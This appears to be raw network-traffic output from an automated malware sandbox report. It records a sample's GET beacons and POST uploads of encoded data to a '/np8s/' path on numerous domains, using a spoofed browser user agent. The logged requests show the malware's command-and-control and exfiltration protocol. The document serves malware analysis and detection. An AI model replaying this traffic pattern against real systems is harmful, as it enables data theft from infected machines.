Source: global traffic HTTP traffic detected: GET /np8s/?zVB=/pe3of3KthlHX+AZdE40oBjh24oMUm2DhTWzf9+6lBsOaTWyqOSb4stDRDmzQmtt1180&4hM4=o4B0f HTTP/1.1Host: www.halecamilla.siteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?4hM4=o4B0f&zVB=OAQ8ZAk71VYHsoGBQeS0cLLvyBMKMlAsSK0ta2CkcQgnl+jMatCDHwZEkBjakU6FhLRf HTTP/1.1Host: www.ratebill.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?zVB=+1vSQSU4VFPBNkL8EMH3DU8MRg7YeuqbcMOylP3M0ivye7s4zRc3erRZEMINrnM1Idbq&4hM4=o4B0f HTTP/1.1Host: www.topings33.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?4hM4=o4B0f&zVB=d/nstEfJj6EqHIao63FJ0s9GuqA95KQHoqtaktjr9/p2jHwlkCQ3yhCEo1SUrSQk5nZl HTTP/1.1Host: www.jlbwaterdamagerepairseattle.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?4hM4=o4B0f&zVB=uZkZa9PDR+t76IUsjgXNksX18rdkaBR0jzgf+2QyrrE0BTZPOy5IBVEfZpk90w8gWC7R HTTP/1.1Host: www.localbloom.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?zVB=SjFSW0qH8X1Gu/+4r88YNPSLQa2KKx1h4LPt291Cc0nRXdmgbio7b0swgMzU3Pebjd8T&4hM4=o4B0f HTTP/1.1Host: www.brawlhallacodestore.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?4hM4=o4B0f&zVB=xL/YlJAUY6uB/cHSlkc/r5VaZJ7uMa0kbAtysG6BLnWT6huomjvuhq3RLtT5uw3RUbD6 HTTP/1.1Host: www.pdwfifi.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?zVB=0fJNa1pbsGGBLLIqJIKrQqKQ2B2XPA1kKZrGWkGMUEET6sTbN1/jKODkGG9Xc1lZm5PZ&4hM4=o4B0f HTTP/1.1Host: www.68chengxinle.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?zVB=MO+mSdLLrNuwRQYoVJuGLv0I5Vniy3FD6QWfbcj4un1GXTVLdefusF8/o4IGo+fIW5Ou&CTr8g=z48HVPSHfp HTTP/1.1Host: www.refreshertowels.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?zVB=5R3gKgAJtID3s3glssHXeRhFadAM4oJIjGTDo+g9ImvY9tNBMPSBarPOG5Bgot7e+72k&CTr8g=z48HVPSHfp HTTP/1.1Host: www.muddybootslife.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?zVB=LP9EI17xKnNeim8nLd+KxbxmCUjQ+ejx+5/wYAWzXpI6ry2rccLFMoZPirUOcSWhDiha&CTr8g=z48HVPSHfp HTTP/1.1Host: www.84866.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?zVB=uZkZa9PDR+t76IUsjgXNksX18rdkaBR0jzgf+2QyrrE0BTZPOy5IBVEfZpk90w8gWC7R&CTr8g=z48HVPSHfp HTTP/1.1Host: www.localbloom.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?4hM4=o4B0f&zVB=OAQ8ZAk71VYHsoGBQeS0cLLvyBMKMlAsSK0ta2CkcQgnl+jMatCDHwZEkBjakU6FhLRf HTTP/1.1Host: www.ratebill.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?zVB=+1vSQSU4VFPBNkL8EMH3DU8MRg7YeuqbcMOylP3M0ivye7s4zRc3erRZEMINrnM1Idbq&4hM4=o4B0f HTTP/1.1Host: www.topings33.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /np8s/?4hM4=o4B0f&zVB=d/nstEfJj6EqHIao63FJ0s9GuqA95KQHoqtaktjr9/p2jHwlkCQ3yhCEo1SUrSQk5nZl HTTP/1.1Host: www.jlbwaterdamagerepairseattle.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 160.153.136.3 160.153.136.3
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.jlbwaterdamagerepairseattle.comConnection: closeContent-Length: 409Cache-Control: no-cacheOrigin: http://www.jlbwaterdamagerepairseattle.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.jlbwaterdamagerepairseattle.com/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 7a 56 42 3d 53 39 54 57 7a 6a 54 34 6d 34 78 55 56 49 6a 61 73 47 34 71 30 72 6c 77 6d 4a 77 72 34 4a 34 34 74 39 4d 76 34 4b 57 39 74 39 4e 74 79 31 52 38 31 78 74 34 39 46 58 46 37 45 76 32 70 58 42 30 28 41 74 37 69 4b 36 71 49 56 6d 76 39 73 4d 53 73 6e 41 6f 70 2d 56 39 53 42 76 38 56 6d 62 59 35 51 63 55 28 2d 69 69 4b 52 56 62 47 6c 51 6d 4e 68 38 31 4d 4d 43 69 4e 57 39 79 63 45 66 74 49 6e 7e 31 6a 7a 49 58 69 73 76 52 77 69 42 55 49 35 61 67 4c 73 65 51 42 38 72 6d 32 74 66 31 4e 69 62 63 33 2d 4a 73 33 76 37 70 36 4e 43 2d 4f 33 37 67 69 6f 54 58 5a 53 5a 55 7a 5a 35 4e 75 72 72 74 39 4e 31 73 6d 52 32 7a 49 38 44 31 4b 4d 46 31 6f 44 4b 4a 42 6f 54 76 7e 31 70 57 45 35 37 32 42 6e 58 79 67 69 79 73 53 50 4e 42 54 5f 6b 43 6d 51 55 37 54 7a 79 6d 69 47 4c 79 7a 36 76 2d 77 38 52 5f 69 64 4b 54 6f 4e 36 4d 6f 5f 45 32 33 4c 50 4e 31 62 47 73 58 4d 4e 6b 4f 50 67 57 32 69 6a 6c 70 51 77 2d 6e 50 39 51 36 48 68 72 63 50 77 6f 53 41 71 74 6f 37 62 64 44 71 56 50 35 74 30 49 6b 56 67 31 41 36 48 4d 73 7a 59 6d 55 38 4a 66 30 43 66 38 52 59 6e 76 64 62 6a 78 47 77 72 4b 41 6b 49 7a 6f 6b 41 6f 4c 6d 39 59 49 34 67 5f 4c 79 41 34 76 4f 55 52 39 4f 75 58 44 32 7a 79 53 51 78 4a 46 47 6d 48 73 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: zVB=S9TWzjT4m4xUVIjasG4q0rlwmJwr4J44t9Mv4KW9t9Nty1R81xt49FXF7Ev2pXB0(At7iK6qIVmv9sMSsnAop-V9SBv8VmbY5QcU(-iiKRVbGlQmNh81MMCiNW9ycEftIn~1jzIXisvRwiBUI5agLseQB8rm2tf1Nibc3-Js3v7p6NC-O37gioTXZSZUzZ5Nurrt9N1smR2zI8D1KMF1oDKJBoTv~1pWE572BnXygiysSPNBT_kCmQU7TzymiGLyz6v-w8R_idKToN6Mo_E23LPN1bGsXMNkOPgW2ijlpQw-nP9Q6HhrcPwoSAqto7bdDqVP5t0IkVg1A6HMszYmU8Jf0Cf8RYnvdbjxGwrKAkIzokAoLm9YI4g_LyA4vOUR9OuXD2zySQxJFGmHsg).
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.jlbwaterdamagerepairseattle.comConnection: closeContent-Length: 36477Cache-Control: no-cacheOrigin: http://www.jlbwaterdamagerepairseattle.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.jlbwaterdamagerepairseattle.com/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 7a 56 42 3d 53 39 54 57 7a 69 75 7a 6f 6f 73 43 62 34 28 35 71 78 6f 2d 67 72 31 49 6c 35 30 30 32 6f 55 6a 37 66 6b 64 32 76 72 50 75 38 6b 77 6a 57 30 65 6a 44 64 67 39 46 48 67 33 57 62 36 34 6e 46 31 28 41 45 71 69 4b 32 71 4a 57 58 6b 7e 4e 63 30 74 46 59 70 72 65 56 46 54 42 75 34 52 6e 47 49 35 54 77 71 28 39 43 79 4b 43 52 62 46 44 63 6d 63 53 6b 45 50 73 43 6b 46 32 74 75 42 30 54 4b 49 6a 62 6f 6a 32 6f 58 69 63 6a 52 28 6a 78 56 41 65 4f 6e 66 73 66 61 58 73 72 37 73 64 6a 4c 4e 6b 48 45 33 5f 31 73 77 64 66 70 36 5a 79 2d 49 41 75 32 70 34 54 65 64 53 5a 54 6c 70 38 54 75 76 4c 70 39 4d 78 38 68 6a 71 7a 4c 73 44 6f 41 37 34 56 35 67 54 4c 53 6f 6e 49 7e 31 74 37 46 74 36 6c 42 6d 4b 68 32 6e 32 35 57 74 56 34 54 39 6f 6b 6b 77 55 6e 63 54 79 39 69 47 4c 43 7a 36 75 64 77 38 4e 5f 69 63 53 54 6e 39 4b 4d 35 74 64 67 31 37 50 55 28 37 47 79 54 4d 77 5f 4f 50 35 39 32 67 58 50 70 41 4d 2d 31 71 68 51 79 44 42 6f 4a 50 78 74 54 41 72 77 31 72 62 6b 44 71 55 69 35 76 64 4e 6b 43 6f 31 41 72 48 4d 76 52 41 6d 54 63 4a 66 78 43 66 69 66 34 71 6b 64 62 37 74 47 77 62 61 41 53 45 7a 6f 31 67 6f 4c 43 70 59 4c 49 67 5f 53 69 42 7a 76 63 39 65 36 39 32 63 4a 56 69 4b 4e 52 70 62 47 31 6a 34 34 46 49 51 28 68 62 42 59 33 70 57 39 42 6b 72 7e 65 78 36 52 4a 69 6f 7a 4e 79 57 36 30 66 67 54 38 41 52 61 72 76 36 76 4b 57 79 67 42 49 31 47 73 34 65 77 45 55 68 4a 52 7a 62 46 49 57 31 64 56 6a 2d 63 6f 64 4a 55 31 6c 42 65 79 70 4e 51 55 39 36 4d 4d 36 33 71 37 6c 4c 73 4c 7e 44 5a 4b 50 30 55 42 44 30 49 61 33 34 79 78 7a 4f 33 75 34 76 54 57 39 52 39 4f 6b 64 33 71 47 66 58 55 74 39 37 2d 53 30 51 57 58 52 38 50 48 6a 45 6b 4c 69 59 62 4d 4b 56 35 69 6c 61 4b 63 56 48 58 49 56 58 58 79 33 53 69 72 33 63 73 57 4c 69 70 70 4e 6e 42 64 69 38 6d 43 31 75 6e 43 49 53 70 54 6c 4f 6e 63 48 48 72 6c 4e 46 63 4c 68 47 51 4b 58 43 67 4f 71 47 63 30 55 4f 72 6d 63 49 65 34 74 56 6e 52 6d 76 59 54 30 66 47 6c 61 77 53 4b 4a 36 67 54 66 34 59 50 48 72 38 7a 71 7a 36 48 44 61 47 41 50 49 65 49 32 68 39 48 4d 44 62 4a 36 4a 31 41 6c 54 32 72 58 57 4f 56 49 72 41 4d 4d 66 48 7e 6d 69 6f 53 6a 36 69 44 4a 51 50 50 36 74 47 79 36 47 58 67 51 7e 2d 57 42 48 45 72 65 30 6b 75 32 4b 6e 4d 44 31 51 47 63 55 69 54 65 78 75 28 49 6a 64 65 56 56 6a 69 58 5a 6c 41 57 61 47 53 42 79 69 4b 4e 6b 33 55 68 72 41 35 73 55 73 7a 66 74 77 47 37 4c 6a 71 41 37 6f 62 4a 6c 44 79 66 46 6d 47 55 4a 75 34 4d 41 33 56 30 39 78 6f 58 6a 6d 33 49 74 47 77 52 59 6a 6f 5a 53 39 34 70 70 46 6d 4a 50 67 7a 61 36 36 59 6e 39 4c 63 70 73 52 64
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.localbloom.onlineConnection: closeContent-Length: 409Cache-Control: no-cacheOrigin: http://www.localbloom.onlineUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.localbloom.online/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 7a 56 42 3d 68 62 51 6a 45 64 37 4f 55 73 31 78 6c 61 46 55 36 51 47 50 31 73 33 44 33 6f 39 35 66 51 5a 58 33 30 42 61 73 6c 52 6c 74 6f 63 45 41 68 31 75 4d 67 6f 45 50 46 55 61 4f 4b 4d 63 6b 6a 4e 79 44 6b 7e 62 44 79 68 4f 66 59 51 73 46 65 52 36 78 57 55 33 43 52 39 57 46 51 68 75 67 6a 48 37 6b 68 36 55 62 74 78 5a 54 32 52 67 4c 51 75 63 59 53 4f 58 4a 35 55 75 46 58 69 6a 28 67 61 63 73 4c 59 4a 4a 49 59 36 4e 55 34 4f 54 74 6c 53 39 35 77 70 36 69 55 67 64 4d 6c 77 4b 46 64 77 79 73 63 50 4c 50 4f 39 38 5f 50 67 70 61 33 56 59 67 57 6d 5a 6c 46 41 6f 4f 78 76 28 6c 6a 4b 36 38 51 4b 6a 5f 54 78 43 66 49 65 61 42 71 6c 66 55 59 56 35 38 54 4b 47 43 30 4d 6f 52 71 49 53 70 72 56 36 46 54 77 42 57 69 44 35 38 42 4f 44 61 43 4d 7e 6c 68 45 6f 63 45 7a 46 66 7a 43 54 63 58 66 6c 4e 4f 71 34 4e 61 74 7a 44 51 48 43 43 73 41 72 44 34 30 49 34 6a 6c 65 56 66 58 79 37 58 53 7a 33 4a 72 74 4e 57 33 57 61 54 39 76 59 69 78 72 48 31 73 4d 44 36 7a 6a 45 56 59 54 51 6c 51 37 63 4b 47 49 6f 67 68 64 67 4b 4d 6b 41 68 4c 6c 51 6c 69 72 34 49 71 7e 30 30 66 4e 41 43 63 71 37 28 42 78 6c 56 4e 43 33 32 49 34 71 6f 55 75 74 44 68 6b 51 36 62 4d 7a 66 78 4c 65 44 46 43 35 67 79 70 42 6c 57 53 4c 44 38 70 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: zVB=hbQjEd7OUs1xlaFU6QGP1s3D3o95fQZX30BaslRltocEAh1uMgoEPFUaOKMckjNyDk~bDyhOfYQsFeR6xWU3CR9WFQhugjH7kh6UbtxZT2RgLQucYSOXJ5UuFXij(gacsLYJJIY6NU4OTtlS95wp6iUgdMlwKFdwyscPLPO98_Pgpa3VYgWmZlFAoOxv(ljK68QKj_TxCfIeaBqlfUYV58TKGC0MoRqISprV6FTwBWiD58BODaCM~lhEocEzFfzCTcXflNOq4NatzDQHCCsArD40I4jleVfXy7XSz3JrtNW3WaT9vYixrH1sMD6zjEVYTQlQ7cKGIoghdgKMkAhLlQlir4Iq~00fNACcq7(BxlVNC32I4qoUutDhkQ6bMzfxLeDFC5gypBlWSLD8pw).
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.localbloom.onlineConnection: closeContent-Length: 36477Cache-Control: no-cacheOrigin: http://www.localbloom.onlineUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.localbloom.online/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 7a 56 42 3d 68 62 51 6a 45 59 54 69 62 5f 78 73 37 61 4a 6e 33 46 53 62 36 38 6e 37 31 59 34 6f 54 79 74 55 6d 32 70 4f 69 46 67 56 73 70 6b 6b 48 53 42 50 49 6e 6c 52 50 42 5a 2d 4b 5f 6b 59 33 54 42 7a 44 6b 33 36 44 79 6c 4f 65 59 49 61 46 2d 68 45 79 31 73 30 45 78 39 6d 45 51 68 4e 6b 6e 48 47 6b 68 75 36 62 74 35 7a 54 6d 64 67 4e 7a 47 63 4d 68 6d 63 55 4a 55 6b 5a 48 79 5f 69 77 47 72 73 4c 51 72 4a 49 6b 36 4f 6b 30 4f 56 4e 31 64 32 61 59 6d 39 79 55 68 58 73 6c 70 54 56 67 4a 79 73 49 74 4c 4f 79 39 39 4e 62 67 34 61 58 56 61 52 57 6e 57 31 46 5a 73 4f 78 75 37 6c 28 62 36 38 4d 4f 6a 37 71 47 43 4f 38 65 49 68 71 67 59 47 35 71 71 37 48 5a 45 43 42 63 6f 52 6d 74 63 64 79 54 36 42 43 72 58 54 76 37 37 65 70 77 44 59 75 6d 79 6c 68 41 39 73 46 6e 46 66 79 5f 54 63 58 68 6c 4e 65 71 34 4c 61 74 7a 58 38 48 45 48 34 42 30 6a 34 78 4d 34 6a 33 61 56 6a 76 79 36 28 6f 7a 32 6c 37 71 36 6d 33 58 50 37 39 6e 62 4b 79 77 48 30 70 42 6a 36 52 7e 30 55 50 54 51 6c 32 37 64 4b 6f 49 2d 6b 68 50 46 6d 4d 6a 6d 56 4c 70 41 6c 69 6b 59 49 73 72 45 34 50 4e 41 61 59 71 37 50 72 78 57 35 4e 42 6c 7e 49 37 4c 6f 55 39 4e 44 68 6f 77 37 5a 66 6a 7a 31 4f 38 37 44 42 5a 56 4e 30 67 30 41 55 34 4f 79 35 6d 30 67 71 48 30 47 4b 57 50 51 37 77 6f 37 4f 4b 45 62 79 49 28 36 4e 41 4e 6d 6d 57 68 41 71 49 37 56 55 47 76 78 4a 6d 76 55 54 58 39 42 72 79 63 47 56 39 34 65 37 6c 45 44 49 69 37 5a 64 44 76 59 43 41 52 39 39 4f 4f 2d 61 75 7e 47 6b 68 63 77 5a 32 6e 5a 57 34 43 32 52 78 41 44 68 65 4e 66 38 31 76 70 69 61 52 78 52 42 53 72 58 6c 66 68 73 6e 39 53 47 37 32 74 51 35 33 36 6b 50 6b 68 36 6b 73 59 7a 2d 30 48 43 45 55 4c 63 52 48 6f 7a 6a 58 63 4d 45 6f 75 70 36 48 4d 72 44 71 59 6c 4e 49 6c 51 38 63 43 6d 32 51 44 4b 52 47 66 74 6e 62 63 6e 4b 32 55 67 6a 47 70 4e 33 4d 37 6d 42 38 4f 77 53 64 7a 30 69 46 73 4a 70 70 6f 64 45 47 4a 6a 69 36 4a 64 43 4e 6e 70 7a 71 69 62 66 4f 4f 53 67 69 33 56 54 68 37 6f 76 4e 4b 68 5f 73 42 66 34 33 6e 4e 4d 35 34 4b 38 75 66 61 44 41 6d 73 64 62 62 31 57 36 54 53 67 6f 4d 71 75 64 66 28 77 59 2d 6a 72 48 65 4b 33 6a 6c 57 6e 65 39 74 2d 45 77 30 58 66 53 74 4b 61 70 6c 34 4b 6b 4d 59 76 69 43 5f 7e 75 72 45 64 48 63 71 56 44 6b 4b 4f 56 4f 6d 42 41 54 47 4c 37 59 30 35 68 61 77 5a 55 32 74 61 38 6d 4f 50 58 4f 58 47 64 67 33 46 4e 49 51 46 65 30 2d 5a 45 6b 74 6e 57 65 45 30 78 6a 31 78 76 39 39 56 6d 4d 76 55 6c 71 6b 56 6f 63 6f 4b 43 6d 58 78 67 44 59 4d 34 62 73 4a 44 4c 51 37 55 30 6a 4d 6d 61 6b 6c 6e 74 6e 32 78 33 4c 79 7a 45 44 64 4b 4a 35 69 57 49 39 57 6a 44 46 6f 64 4e 4f 61 58 32 43 31 64 77
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.brawlhallacodestore.comConnection: closeContent-Length: 409Cache-Control: no-cacheOrigin: http://www.brawlhallacodestore.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.brawlhallacodestore.com/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 7a 56 42 3d 64 68 78 6f 49 54 6a 33 67 6d 68 49 79 5a 4c 45 71 4b 6b 50 56 61 65 6f 58 59 48 59 4d 6c 74 7a 67 66 43 76 6d 4e 74 68 53 42 54 78 62 4a 4f 61 63 6e 74 51 62 67 4d 70 6a 75 62 61 7a 65 43 72 38 34 34 6c 55 54 49 50 58 51 32 7a 45 32 4f 4a 6a 30 6d 2d 48 63 53 52 6d 33 52 6f 72 66 71 79 56 7a 42 49 31 6a 68 4a 6e 56 50 6c 4c 36 64 33 4b 34 53 4f 30 74 74 32 77 58 54 6c 46 62 4c 62 42 36 46 71 51 51 6b 46 6a 6d 4b 49 58 64 39 37 51 63 57 4a 73 7a 7e 75 73 47 61 31 6f 66 45 44 53 58 7e 79 4b 42 28 5a 61 78 63 58 55 74 44 72 44 6d 52 5a 57 58 73 71 73 36 32 69 6e 57 74 5f 32 49 7e 59 4e 59 28 70 4a 76 7a 4f 5a 52 70 33 34 78 49 30 73 50 7e 57 6d 76 34 71 62 70 51 4f 38 49 4a 48 4a 75 63 30 42 73 6e 4a 71 39 33 55 78 45 4a 39 38 58 4e 73 31 4e 36 72 46 47 66 6e 61 61 6e 35 48 61 6e 2d 78 6f 43 6e 41 65 36 71 6d 33 38 4d 34 57 4c 38 33 35 33 65 78 4d 4f 4a 78 38 62 6e 64 61 68 4f 39 43 63 68 4d 75 59 6f 6e 49 4d 36 32 2d 59 68 45 66 6b 55 37 77 79 6e 43 62 4c 73 57 71 68 6c 6f 73 31 6d 4f 31 57 30 30 39 4c 55 4e 36 68 6c 41 34 59 4c 4d 30 67 4b 37 38 70 30 70 4c 68 32 56 63 6d 44 69 38 76 68 42 74 49 62 49 71 7a 6c 53 77 72 58 54 38 77 61 58 65 62 66 53 50 31 79 6b 57 4b 4f 51 2d 28 75 62 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: zVB=dhxoITj3gmhIyZLEqKkPVaeoXYHYMltzgfCvmNthSBTxbJOacntQbgMpjubazeCr844lUTIPXQ2zE2OJj0m-HcSRm3RorfqyVzBI1jhJnVPlL6d3K4SO0tt2wXTlFbLbB6FqQQkFjmKIXd97QcWJsz~usGa1ofEDSX~yKB(ZaxcXUtDrDmRZWXsqs62inWt_2I~YNY(pJvzOZRp34xI0sP~Wmv4qbpQO8IJHJuc0BsnJq93UxEJ98XNs1N6rFGfnaan5Han-xoCnAe6qm38M4WL8353exMOJx8bndahO9CchMuYonIM62-YhEfkU7wynCbLsWqhlos1mO1W009LUN6hlA4YLM0gK78p0pLh2VcmDi8vhBtIbIqzlSwrXT8waXebfSP1ykWKOQ-(ubQ).
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.brawlhallacodestore.comConnection: closeContent-Length: 36477Cache-Control: no-cacheOrigin: http://www.brawlhallacodestore.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.brawlhallacodestore.com/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 7a 56 42 3d 64 68 78 6f 49 52 47 73 39 46 6c 6a 38 73 54 33 72 63 78 47 65 4c 75 71 52 6f 44 64 4a 68 6c 61 6b 74 32 37 69 50 30 5a 54 45 58 76 66 35 37 36 4b 51 42 49 62 68 52 69 37 4e 76 67 30 2d 4f 6f 38 34 67 66 55 54 38 50 55 54 32 6a 45 52 4b 6e 69 58 4f 78 46 38 54 30 6e 33 51 75 39 61 79 50 56 7a 4d 64 31 67 42 5a 79 31 62 6c 4b 5a 31 33 62 62 4b 4a 36 74 74 34 34 33 43 38 4b 37 47 78 42 37 74 69 51 52 59 46 6a 57 4f 49 58 39 74 6b 45 72 43 4b 68 44 7e 72 70 47 61 73 6d 4f 35 77 53 58 7a 56 4b 42 7a 5a 61 43 6f 58 53 2d 37 72 46 58 52 61 43 58 73 76 6d 61 33 67 77 47 67 6a 32 49 69 71 4e 61 54 66 49 66 33 4f 49 78 70 79 70 53 5a 42 28 49 66 55 6b 72 35 43 62 70 63 6a 38 5a 55 59 4a 76 77 55 47 62 65 68 6f 62 6a 36 78 47 6c 62 77 58 4d 6c 36 74 37 70 46 47 66 68 61 61 6e 48 48 62 58 2d 78 76 32 6e 47 61 61 71 76 52 49 50 6e 57 4c 35 68 4a 32 44 31 4d 4c 6f 78 38 43 70 64 65 34 56 38 78 6f 68 57 62 38 6f 32 4e 67 35 7e 75 59 6a 46 66 6b 63 6b 41 79 6f 43 62 4c 46 57 76 4e 31 76 62 39 6d 63 33 7e 30 7a 65 6a 55 50 4b 68 6c 65 6f 59 4a 43 6b 74 58 37 38 78 77 70 4c 51 44 56 72 7e 44 69 76 33 68 42 49 6b 62 4a 36 7a 6c 48 41 71 46 64 34 70 49 62 75 48 42 52 2d 6c 32 38 45 6a 67 47 4b 32 37 4f 46 67 46 7e 59 72 5a 34 66 64 45 49 4b 4d 55 43 51 30 64 6f 30 39 78 6d 56 79 31 64 4f 6e 6d 68 4c 7e 4f 74 4e 4e 6f 28 59 6c 34 4c 50 4e 4c 55 50 31 6f 6f 4c 54 33 4b 7a 6c 36 41 53 45 68 49 72 69 37 6c 59 44 5a 6a 73 45 67 75 4e 57 30 5a 49 69 47 48 69 76 58 59 59 6f 4a 31 65 47 70 30 52 39 77 45 4d 42 38 49 52 6f 31 56 37 4f 56 47 51 30 34 65 30 69 5a 34 36 37 67 28 77 37 55 4f 53 33 30 56 59 57 6d 35 6e 4f 6f 78 36 47 44 64 5f 75 55 74 78 65 54 48 31 42 39 53 6b 70 50 41 79 5a 36 38 5a 55 77 37 61 4b 56 44 56 75 5f 4b 58 58 46 67 48 47 6c 79 78 68 49 54 54 4e 48 42 73 7e 64 36 76 6e 44 36 43 63 51 6c 52 4b 73 73 35 58 42 47 68 4d 4d 42 4a 61 67 79 71 32 74 6a 65 58 4b 70 47 56 51 32 43 47 38 42 56 46 79 42 55 58 54 7e 51 6a 43 61 33 4e 45 76 61 42 44 43 73 33 4c 30 4f 62 4f 71 76 6d 4d 61 58 39 52 73 7a 4d 5a 33 6a 30 37 59 39 57 77 28 75 63 45 4a 6f 6d 38 52 6d 6e 36 73 36 37 4d 70 56 7e 63 72 68 48 57 69 73 31 54 7a 35 76 59 32 53 69 41 6e 72 50 51 4e 64 43 46 76 72 6d 6f 6b 50 31 58 6c 36 53 5f 5a 74 38 31 55 68 6c 63 4d 59 4c 4f 54 49 52 67 7e 67 52 78 74 66 79 77 6c 4f 61 7a 39 77 41 71 41 6e 4e 4a 6a 74 39 61 48 77 72 6c 64 72 4c 4a 42 41 4a 47 49 79 67 45 59 68 28 34 67 5a 36 4b 52 65 34 48 6a 31 46 30 75 42 6c 46 6a 78 52 4b 73 41 47 4b 71 34 68 34 33 36 77 42 72 35 55 57 46 61 46 4c 79 69 67 42 6f 68 6f 47 71 70 49
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.pdwfifi.comConnection: closeContent-Length: 409Cache-Control: no-cacheOrigin: http://www.pdwfifi.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.pdwfifi.com/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 7a 56 42 3d 7e 4a 4c 69 37 73 45 78 62 34 72 33 6b 39 4b 7a 77 46 68 38 79 39 56 43 56 59 4b 36 62 59 78 75 49 56 34 78 33 6d 65 4a 48 6b 6d 35 36 46 43 5a 70 53 53 68 69 76 43 6a 4a 5f 76 2d 75 79 50 6e 44 75 33 45 35 6a 78 6c 52 61 6d 35 69 49 62 4a 6e 4b 7a 63 55 52 73 58 6f 73 37 61 46 63 69 51 52 4e 4c 68 6f 42 43 59 44 34 74 67 36 53 76 6c 4b 44 74 5a 77 2d 4f 45 77 4f 34 32 76 41 76 43 49 2d 64 67 49 6c 64 66 79 6e 75 4d 50 68 66 62 39 31 68 56 46 37 54 61 58 78 54 39 64 6b 6d 42 4c 63 28 71 65 36 31 46 36 4e 6c 71 72 6a 34 77 30 58 43 4e 66 71 6b 4c 73 4b 41 64 75 59 44 37 7e 38 6f 7a 45 37 71 65 51 67 57 32 44 4c 4b 52 77 43 4e 75 33 34 6a 2d 41 5f 49 56 72 4c 78 37 46 52 28 46 31 78 62 6e 53 68 69 44 6f 67 67 78 67 79 72 45 35 33 4e 76 30 63 47 53 77 78 4e 30 38 41 36 57 70 54 50 70 52 2d 55 51 49 39 5a 4d 43 4e 4b 55 41 63 68 58 6f 69 39 78 34 4a 64 70 55 6d 6c 67 57 36 36 36 44 66 4d 41 62 67 67 44 71 74 75 6b 48 65 49 78 56 37 46 4c 61 4c 47 4a 58 39 41 4a 5a 37 50 34 5a 2d 35 47 74 4c 50 59 7a 41 74 56 51 4f 75 54 51 33 31 55 78 73 77 73 6c 6b 6f 33 57 69 6c 39 4f 36 7a 6f 59 41 33 49 46 4d 4b 51 32 48 49 54 58 37 44 78 61 34 70 36 57 41 4c 72 62 45 39 72 64 75 68 4f 70 4b 4c 56 4c 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 